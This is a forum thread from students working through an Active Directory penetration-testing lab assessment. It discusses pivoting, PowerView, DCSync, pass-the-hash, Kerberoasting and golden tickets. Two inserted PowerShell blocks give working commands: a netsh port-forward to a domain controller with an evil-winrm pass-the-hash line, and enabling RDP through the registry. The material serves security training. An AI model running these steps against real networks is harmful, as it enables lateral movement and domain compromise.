MVP! I hate this webshell, thanks so much.
Hey again cheekychimp,
Was wondering if you were able to get PowerView.ps1 working?
I’m trying to use Get-DomainUser but end up with a “The term 'Get-DomainUser' is not recognized as the name of a cmdlet, function…”
If I use -Force, I get an error “Cannot bind argument to parameter ‘Type’ because it is null”.
Would appreciate some help!
Hi @cooljagdash - I did get it working, from MS01. If you follow the hints from Jinn and then copy and paste the PowerView.ps1 file onto the machine, that usually worked for me. Sometimes when copying and pasting files it seemed to block them, so I waited 5-6 minutes then moved them across.
@cheekychimp - The strange thing is that I do have RDP access from pwnbox to MS01 while having WEB-WIN01 acting as a pivot to redirect RDP traffic to MS01.
Where did you get PowerView.ps1? From /usr/share/…/… ?
I’ll have to try again, maybe I’m missing something small.
I downloaded PowerView from the net, just double checked it was the right one. Then followed what Jinn said to do - which lets you RDP and Copy over the files you download. Made sure I waited 5-6 minutes then copied across PowerView and it worked.
I’m just trying to do the DCSync and finish the task.
Thanks cheekychimp, your tip worked (waiting 5-6 minutes).
Turns out, I didn’t need to use PowerView.ps1 to complete this assessment.
Due to this issue I was forced to not use PowerView, but it would’ve been helpful and sped things up.
I also managed to successfully do the DCSync.
Let me know if you need any help with this.
Anyone able to assist? I have the administrator hash but cannot pass it for some reason.
Hey Mike, here’s what I did once I had the Administrator NTLM hash:
I used netsh.exe on 10.129.xxx.xxx to listen for packets on port 8001 and send them to DC01 on port 5985.
Then I used a PtH attack with evil-winrm to connect to 10.129.xxx.xxx on port 8001. Once 10.129.xxx.xxx receives the packets on that port, it will forward them to DC01, allowing me to connect to DC01.
The port forwarding module on Pen tester path explains this.
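The netsh forward and pass-the-hash connection described in the post above, written out as an added example (these are not the poster's own commands). The thread masks the pivot as 10.129.xxx.xxx and gives no DC01 address, so `$Dc01` and the NT hash are placeholders, and 8001 is just the listener port the poster chose.

```powershell
# Added example: stand up a TCP relay on the pivot (the host the thread calls
# 10.129.xxx.xxx) so that pivot:8001 -> DC01:5985 (WinRM over HTTP).
# Run in an elevated PowerShell session on the pivot; portproxy is backed by the
# IP Helper service (iphlpsvc), which must be running.
# ASSUMPTIONS: $Dc01 is DC01's address (not given in the thread), 8001 is the
# listener port from the post, the firewall rule name is my own.
$Dc01       = '10.129.0.10'   # assumed DC01 address, replace with the real one
$ListenPort = 8001
$ListenAddr = '0.0.0.0'

# 1. Add the IPv4 -> IPv4 proxy. netsh starts listening immediately and the
#    rule persists across reboots until it is deleted.
netsh interface portproxy add v4tov4 listenaddress=$ListenAddr listenport=$ListenPort connectaddress=$Dc01 connectport=5985

# 2. Let the listener through the host firewall; without this the proxy is
#    up but the attack box's SYN to 8001 is still dropped.
netsh advfirewall firewall add rule name="PortProxy-$ListenPort" dir=in action=allow protocol=TCP localport=$ListenPort

# 3. Check: the rule is listed and the socket is actually in Listen state.
netsh interface portproxy show v4tov4
Get-NetTCPConnection -LocalPort $ListenPort -State Listen

# From the attack box, pass the hash through the forward. evil-winrm flags:
# -i target, -P port, -u user, -H NT hash (placeholder hash, not a real one):
#   evil-winrm -i 10.129.xxx.xxx -P 8001 -u Administrator -H <NT_HASH>

# 4. Cleanup when finished, so the pivot is not left relaying to the DC.
netsh interface portproxy delete v4tov4 listenaddress=$ListenAddr listenport=$ListenPort
netsh advfirewall firewall delete rule name="PortProxy-$ListenPort"
```

A `netsh ... show v4tov4` entry with no listening socket usually means the IP Helper service is stopped; `Start-Service iphlpsvc` brings the listener up without re-adding the rule.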
I was able to get in using psexec.py on Kali. I already had a tunnel using chisel. Thanks anyway. I will probably go back and try your method.
Moving on to Assessment 2 for now.
I finished Assessment 1. But I really wanted to use a golden ticket with impacket-ticketer. I kept getting
socket error or timeout! [Errno 111] Connection refused
If anyone managed to accomplish this, can you PM me with the command string you used?
Dude. Sick find with turning on RDP via registry.
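Turning on RDP via the registry, as referred to in the post above, as an added example that is not the finder's own commands. It assumes an elevated shell on the target and an English-locale Windows (the firewall rule group is looked up by display name).

```powershell
# Added example (not from the thread): enable Remote Desktop on a host where
# you already hold an elevated shell, open the firewall, and verify.
# ASSUMPTION: English locale, so the built-in rule group is 'Remote Desktop'.

# fDenyTSConnections = 1 refuses incoming RDP; 0 allows it.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
    -Name 'fDenyTSConnections' -Value 0 -Type DWord

# Open TCP/UDP 3389 through the built-in rule group instead of a custom rule.
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

# TermService normally picks the change up on its own; start it if stopped.
if ((Get-Service TermService).Status -ne 'Running') { Start-Service TermService }

# Verify: value is 0 and something is listening on 3389.
Get-ItemPropertyValue -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections'
Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue
```

If the key flips to 0 but nothing listens on 3389, check whether NLA or a GPO is overriding the setting under `HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services` before assuming the service is broken.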
Made it through with golden ticket, this helped a lot
A little help for everyone. Everything is mostly in this thread. First, get rid of the webshell, it’ll make things a lot easier. @CrazyHorse302 gave a good link for this. Then you’ll have to find a new user and get its creds. A lil hash cracking will do. Now you have to pivot. @jinn made it easy for me, but there are other ways. You can pass cmds 1 and 4 straight from the webshell or stable shell and then cmd 5. Don’t forget you need to bring your tools along the way too.
Here it starts to be a little more difficult on box 2. Find the user with interesting privileges. Impersonate and attack the DC to dig deeper. The interesting account is an obvious one. As I said in my message up there, I used a golden ticket to get full compromise. The link will help.
Also this can help if you’re lost a little https://www.thehacker.recipes/ad/movement/kerberos
Good walkthrough. I was trying to get it to work using impacket. I haven’t had any notable issues getting a golden ticket via mimikatz.
A hint for Kerberoasting user svc_sql: do I need to convert the base64 blob? Am I on the right track?
thank you for your time.
Hi, I’m stuck at Q4 of AD skills assessment I. I don’t know how to connect to MS01. Can you help me? Thank you.
I think you helped me with pivot skill assessment too xD. Thank you for saving my life again